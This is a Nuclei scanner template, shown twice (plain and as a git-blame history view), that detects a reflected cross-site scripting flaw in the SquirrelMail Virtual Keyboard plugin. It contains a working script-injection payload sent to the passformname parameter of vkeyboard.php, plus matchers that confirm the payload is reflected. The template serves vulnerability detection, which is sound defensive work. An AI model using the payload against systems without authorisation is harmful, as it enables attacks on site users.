nuclei-templates/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss....

id: squirrelmail-vkeyboard-xss

info:
  name: SquirrelMail Virtual Keyboard <=0.9.1 - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: SquirrelMail Virtual Keyboard plugin 0.9.1 and prior contains a cross-site scripting vulnerability via the vkeyboard.php parameter. It fails to properly sanitize user-supplied input, which allows an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.exploit-db.com/exploits/34814
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: xss,squirrelmail,plugin,edb
variables:
  payload: "\"><script>alert({{rand_int()}});</script><script>/*"

http:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname={{url_encode(payload)}}'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'onclick="window.opener.document.forms[0].{{payload}}'
        part: body

      - type: word
        words:
          - "text/html"
        part: header
# digest: 4a0a0047304502207c118985b6c7f93ab8b559b22fb8497d38fa7667b7c2f1a22ade61f76c1730c6022100eb948833018f834a46e2d1b1bc5b876b3ef06db6177d9fb662a492d251241a0d:922c64590222798bb761d5b6d8e72950
Create squirrelmail-vkeyboard-xss.yaml 2021-11-15 18:28:18 +00:00			`id: squirrelmail-vkeyboard-xss`

			`info:`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`name: SquirrelMail Virtual Keyboard <=0.9.1 - Cross-Site Scripting`
Create squirrelmail-vkeyboard-xss.yaml 2021-11-15 18:28:18 +00:00			`author: dhiyaneshDk`
			`severity: medium`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`description: SquirrelMail Virtual Keyboard plugin 0.9.1 and prior contains a cross-site scripting vulnerability via the vkeyboard.php parameter. It fails to properly sanitize user-supplied input, which allows an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/34814`
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements 2022-09-23 17:53:08 +00:00			`classification:`
Match severity with CVSS 2023-03-03 15:27:54 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 5.4`
			`cwe-id: CWE-80`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: xss,squirrelmail,plugin,edb`
fix(squirrelmail-vkeyboard-xss): adding vars, update payload & matcher 2023-07-24 08:45:56 +00:00			`variables:`
			`payload: "\"><script>alert({{rand_int()}});</script><script>/*"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create squirrelmail-vkeyboard-xss.yaml 2021-11-15 18:28:18 +00:00			`- method: GET`
			`path:`
fix(squirrelmail-vkeyboard-xss): adding vars, update payload & matcher 2023-07-24 08:45:56 +00:00			`- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname={{url_encode(payload)}}'`
Update squirrelmail-vkeyboard-xss.yaml 2021-11-16 09:43:47 +00:00
Create squirrelmail-vkeyboard-xss.yaml 2021-11-15 18:28:18 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
fix(squirrelmail-vkeyboard-xss): adding vars, update payload & matcher 2023-07-24 08:45:56 +00:00			`- 'onclick="window.opener.document.forms[0].{{payload}}'`
Create squirrelmail-vkeyboard-xss.yaml 2021-11-15 18:28:18 +00:00			`part: body`

			`- type: word`
			`words:`
			`- "text/html"`
			`part: header`
Auto Template Signing [Thu Oct 19 13:13:50 UTC 2023] :robot: 2023-10-19 13:13:52 +00:00			`# digest: 4a0a0047304502207c118985b6c7f93ab8b559b22fb8497d38fa7667b7c2f1a22ade61f76c1730c6022100eb948833018f834a46e2d1b1bc5b876b3ef06db6177d9fb662a492d251241a0d:922c64590222798bb761d5b6d8e72950`